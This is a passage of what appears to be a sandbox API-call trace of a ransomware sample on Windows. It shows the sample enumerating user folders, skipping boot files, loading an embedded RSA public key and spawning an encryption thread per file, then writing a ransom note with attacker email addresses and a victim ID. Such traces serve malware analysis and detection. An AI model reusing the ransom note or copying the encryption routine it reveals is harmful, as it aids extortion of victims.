LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0138.387] lstrcpyW (in: lpString1=0x17be7c, lpString2="Get Windows Live.url" | out: lpString1="Get Windows Live.url") returned="Get Windows Live.url" [0138.387] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" [0138.387] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x7b0 [0138.387] WaitForSingleObject (hHandle=0x7b0, dwMilliseconds=0xffffffff) returned 0x0 [0138.389] Sleep (dwMilliseconds=0x96) [0138.533] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0138.533] lstrcmpW (lpString1="Windows Live Gallery.url", lpString2="..") returned 1 [0138.533] lstrcmpW (lpString1="Windows Live Gallery.url", lpString2=".") returned 1 [0138.533] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0138.534] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch="ntldr") returned 0x0 [0138.534] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch="NTLDR") returned 0x0 [0138.534] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch="NTDETECT.COM") returned 0x0 [0138.534] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch="ntdetect.com") returned 0x0 [0138.534] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Windows Live\\", lpSrch="Desktop") returned 0x0 [0138.534] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Windows Live\\", lpSrch="DESKTOP") returned 0x0 [0138.534] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") returned 44 [0138.534] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0138.534] lstrcpyW (in: lpString1=0x17be7c, lpString2="Windows Live Gallery.url" | out: lpString1="Windows Live Gallery.url") returned="Windows Live Gallery.url" [0138.534] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" [0138.534] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x7b4 [0138.534] Sleep (dwMilliseconds=0x96) [0138.689] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0138.689] lstrcmpW (lpString1="Windows Live Mail.url", lpString2="..") returned 1 [0138.689] lstrcmpW (lpString1="Windows Live Mail.url", lpString2=".") returned 1 [0138.689] StrStrW (lpFirst="Windows Live Mail.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0138.689] StrStrW (lpFirst="Windows Live Mail.url", lpSrch="ntldr") returned 0x0 [0138.689] StrStrW (lpFirst="Windows Live Mail.url", lpSrch="NTLDR") returned 0x0 [0138.689] StrStrW (lpFirst="Windows Live Mail.url", lpSrch="NTDETECT.COM") returned 0x0 [0138.689] StrStrW (lpFirst="Windows Live Mail.url", lpSrch="ntdetect.com") returned 0x0 [0138.690] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Windows Live\\", lpSrch="Desktop") returned 0x0 [0138.690] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Windows Live\\", lpSrch="DESKTOP") returned 0x0 [0138.690] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") returned 44 [0138.690] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0138.690] lstrcpyW (in: lpString1=0x17be7c, lpString2="Windows Live Mail.url" | out: lpString1="Windows Live Mail.url") returned="Windows Live Mail.url" [0138.690] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" [0138.690] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x7b8 [0138.690] Sleep (dwMilliseconds=0x96) [0138.846] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0138.846] lstrcmpW (lpString1="Windows Live Spaces.url", lpString2="..") returned 1 [0138.846] lstrcmpW (lpString1="Windows Live Spaces.url", lpString2=".") returned 1 [0138.846] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0138.846] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch="ntldr") returned 0x0 [0138.846] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch="NTLDR") returned 0x0 [0138.846] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch="NTDETECT.COM") returned 0x0 [0138.846] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch="ntdetect.com") returned 0x0 [0138.846] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Windows Live\\", lpSrch="Desktop") returned 0x0 [0138.846] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Windows Live\\", lpSrch="DESKTOP") returned 0x0 [0138.846] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") returned 44 [0138.846] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0138.846] lstrcpyW (in: lpString1=0x17be7c, lpString2="Windows Live Spaces.url" | out: lpString1="Windows Live Spaces.url") returned="Windows Live Spaces.url" [0138.846] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" [0138.846] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x7bc [0138.846] Sleep (dwMilliseconds=0x96) [0139.004] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0139.004] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0139.005] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0139.005] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites\\Windows Live" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live") returned="C:\\Users\\Default\\Favorites\\Windows Live" [0139.005] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Windows Live", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\*.*") returned="C:\\Users\\Default\\Favorites\\Windows Live\\*.*" [0139.005] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Windows Live\\", lpSrch="Desktop") returned 0x0 [0139.005] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Windows Live\\", lpSrch="DESKTOP") returned 0x0 [0139.005] SetErrorMode (uMode=0x1) returned 0x1 [0139.005] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Favorites\\Windows Live\\_HELP_INSTRUCTION.TXT") returned 61 [0139.005] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0139.005] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0139.006] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x7c0) returned 0x0 [0139.006] RegQueryValueExW (in: hKey=0x7c0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d01af0, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3d01af0*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0139.006] RegCloseKey (hKey=0x7c0) returned 0x0 [0139.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0139.006] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0139.006] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\favorites\\windows live\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0139.007] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\favorites\\windows live\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.009] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3d11398 [0139.010] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites\\Windows Live") returned="Windows Live" [0139.010] lstrcpyW (in: lpString1=0x17b644, lpString2="Windows Live" | out: lpString1="Windows Live") returned="Windows Live" [0139.010] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0139.010] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0139.010] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0139.010] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0139.010] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0139.010] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0139.010] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0139.010] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0139.010] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0139.010] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0139.011] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0139.011] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0139.011] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 1 [0139.011] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 0 [0139.011] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0139.011] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0139.011] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0139.011] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0139.011] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0139.012] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Links" | out: lpString1="C:\\Users\\Default\\Links") returned="C:\\Users\\Default\\Links" [0139.012] SetErrorMode (uMode=0x1) returned 0x1 [0139.012] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Links" | out: lpString1="C:\\Users\\Default\\Links") returned="C:\\Users\\Default\\Links" [0139.012] lstrcatW (in: lpString1="C:\\Users\\Default\\Links", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Links\\") returned="C:\\Users\\Default\\Links\\" [0139.012] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Links\\" | out: lpString1="C:\\Users\\Default\\Links\\") returned="C:\\Users\\Default\\Links\\" [0139.012] lstrcatW (in: lpString1="C:\\Users\\Default\\Links\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Links\\*.*") returned="C:\\Users\\Default\\Links\\*.*" [0139.012] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Links\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a6290 [0139.014] PathFindFileNameW (pszPath="C:\\Users\\Default\\Links") returned="Links" [0139.014] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Links" | out: lpString1="Links") returned="Links" [0139.014] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0139.014] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0139.014] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0139.014] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0139.015] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0139.015] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0139.015] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0139.015] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0139.015] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0139.015] StrStrW (lpFirst="C:\\Users\\Default\\Links\\", lpSrch="Desktop") returned 0x0 [0139.015] StrStrW (lpFirst="C:\\Users\\Default\\Links\\", lpSrch="DESKTOP") returned 0x0 [0139.015] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Links\\") returned 27 [0139.015] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0139.015] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0139.015] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Links\\" [0139.015] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x7c8 [0139.016] Sleep (dwMilliseconds=0x96) [0139.157] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0139.157] lstrcmpW (lpString1="Desktop.lnk", lpString2="..") returned 1 [0139.157] lstrcmpW (lpString1="Desktop.lnk", lpString2=".") returned 1 [0139.157] StrStrW (lpFirst="Desktop.lnk", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0139.157] StrStrW (lpFirst="Desktop.lnk", lpSrch="ntldr") returned 0x0 [0139.157] StrStrW (lpFirst="Desktop.lnk", lpSrch="NTLDR") returned 0x0 [0139.157] StrStrW (lpFirst="Desktop.lnk", lpSrch="NTDETECT.COM") returned 0x0 [0139.157] StrStrW (lpFirst="Desktop.lnk", lpSrch="ntdetect.com") returned 0x0 [0139.157] StrStrW (lpFirst="C:\\Users\\Default\\Links\\", lpSrch="Desktop") returned 0x0 [0139.157] StrStrW (lpFirst="C:\\Users\\Default\\Links\\", lpSrch="DESKTOP") returned 0x0 [0139.157] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Links\\") returned 27 [0139.157] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0139.158] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Desktop.lnk" | out: lpString1="Desktop.lnk") returned="Desktop.lnk" [0139.158] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Links\\" [0139.158] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x7cc [0139.158] Sleep (dwMilliseconds=0x96) [0139.313] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0139.313] lstrcmpW (lpString1="Downloads.lnk", lpString2="..") returned 1 [0139.313] lstrcmpW (lpString1="Downloads.lnk", lpString2=".") returned 1 [0139.313] StrStrW (lpFirst="Downloads.lnk", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0139.313] StrStrW (lpFirst="Downloads.lnk", lpSrch="ntldr") returned 0x0 [0139.313] StrStrW (lpFirst="Downloads.lnk", lpSrch="NTLDR") returned 0x0 [0139.313] StrStrW (lpFirst="Downloads.lnk", lpSrch="NTDETECT.COM") returned 0x0 [0139.313] StrStrW (lpFirst="Downloads.lnk", lpSrch="ntdetect.com") returned 0x0 [0139.313] StrStrW (lpFirst="C:\\Users\\Default\\Links\\", lpSrch="Desktop") returned 0x0 [0139.313] StrStrW (lpFirst="C:\\Users\\Default\\Links\\", lpSrch="DESKTOP") returned 0x0 [0139.313] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Links\\") returned 27 [0139.314] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV 